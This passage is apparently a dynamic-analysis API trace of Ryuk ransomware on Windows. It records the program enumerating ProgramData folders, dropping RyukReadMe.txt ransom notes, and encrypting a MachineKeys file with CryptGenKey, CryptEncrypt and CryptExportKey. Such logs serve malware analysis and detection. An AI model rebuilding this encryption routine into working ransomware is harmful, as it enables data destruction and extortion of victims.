lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.520] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.520] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.520] SetLastError (dwErrCode=0x0) [0140.520] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.520] GetLastError () returned 0x5 [0140.520] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.520] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.520] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.520] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.520] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.520] SetLastError (dwErrCode=0x0) [0140.520] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\DSS\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\dss\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.520] GetLastError () returned 0x5 [0140.520] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.520] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.521] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.521] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.521] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.521] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.521] SetLastError (dwErrCode=0x0) [0140.521] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\dss\\machinekeys\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0140.521] GetLastError () returned 0x0 [0140.521] WriteFile (in: hFile=0x18c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aca40*=0x320, lpOverlapped=0x0) returned 1 [0140.522] CloseHandle (hObject=0x18c) returned 1 [0140.522] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.522] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.522] SetLastError (dwErrCode=0x0) [0140.522] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\DSS\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\dss\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.522] GetLastError () returned 0x5 [0140.522] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.522] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.522] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.522] SetLastError (dwErrCode=0x0) [0140.522] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.522] GetLastError () returned 0x5 [0140.522] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.522] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.523] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.523] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.523] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.523] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.523] SetLastError (dwErrCode=0x0) [0140.523] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\Keys\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\keys\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.523] GetLastError () returned 0x5 [0140.523] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.523] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.523] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.523] SetLastError (dwErrCode=0x0) [0140.523] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.523] GetLastError () returned 0x5 [0140.523] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.523] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.523] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.523] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.530] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.530] SetLastError (dwErrCode=0x0) [0140.530] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.530] GetLastError () returned 0x5 [0140.530] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.530] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.530] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.531] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.531] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.531] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.531] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\08e575673cce10c72090304839888e02_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", dwFileAttributes=0x80) returned 1 [0140.531] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\08e575673cce10c72090304839888e02_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\machinekeys\\08e575673cce10c72090304839888e02_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0140.531] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=52) returned 1 [0140.531] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=52) returned 1 [0140.531] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0140.531] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0140.531] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.531] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x34, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x34, lpOverlapped=0x0) returned 1 [0140.532] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0140.532] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x34, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x40) returned 1 [0140.532] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.532] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x40, lpOverlapped=0x0) returned 1 [0140.532] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0140.532] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0140.532] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0140.533] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0140.533] CloseHandle (hObject=0x190) returned 1 [0140.548] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.552] CryptDestroyKey (hKey=0x3b8690) returned 1 [0140.552] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.552] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.553] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.553] SetLastError (dwErrCode=0x0) [0140.553] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\machinekeys\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0140.553] GetLastError () returned 0x0 [0140.553] WriteFile (in: hFile=0x18c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aca40*=0x320, lpOverlapped=0x0) returned 1 [0140.554] CloseHandle (hObject=0x18c) returned 1 [0140.554] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.554] SetLastError (dwErrCode=0x0) [0140.554] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.554] GetLastError () returned 0x5 [0140.554] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.554] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.554] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0xffffffffffffffff [0140.554] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0140.554] SetLastError (dwErrCode=0x0) [0140.554] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.554] GetLastError () returned 0x5 [0140.554] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.554] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.554] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.554] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.555] SetLastError (dwErrCode=0x0) [0140.555] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.557] GetLastError () returned 0x5 [0140.557] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.557] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.557] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.557] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.557] SetLastError (dwErrCode=0x0) [0140.558] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.558] GetLastError () returned 0x5 [0140.558] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.558] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.558] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.558] SetLastError (dwErrCode=0x0) [0140.558] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.558] GetLastError () returned 0x5 [0140.558] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.558] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.558] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.558] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.558] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.558] SetLastError (dwErrCode=0x0) [0140.558] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.558] GetLastError () returned 0x5 [0140.558] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.558] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.558] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.559] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.559] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.559] SetLastError (dwErrCode=0x0) [0140.559] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.559] GetLastError () returned 0x5 [0140.559] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.559] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.559] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.561] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.561] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.561] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.561] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", dwFileAttributes=0x80) returned 0 [0140.561] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.561] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.561] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.561] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.561] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.562] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml", dwFileAttributes=0x80) returned 0 [0140.562] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.562] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.562] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.562] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.562] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.563] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", dwFileAttributes=0x80) returned 0 [0140.563] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.563] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.563] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.563] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.563] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.563] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", dwFileAttributes=0x80) returned 0 [0140.563] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.563] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.563] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.564] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.564] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.564] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", dwFileAttributes=0x80) returned 0 [0140.564] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.565] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.565] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.565] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.565] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.565] SetLastError (dwErrCode=0x0) [0140.565] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\device 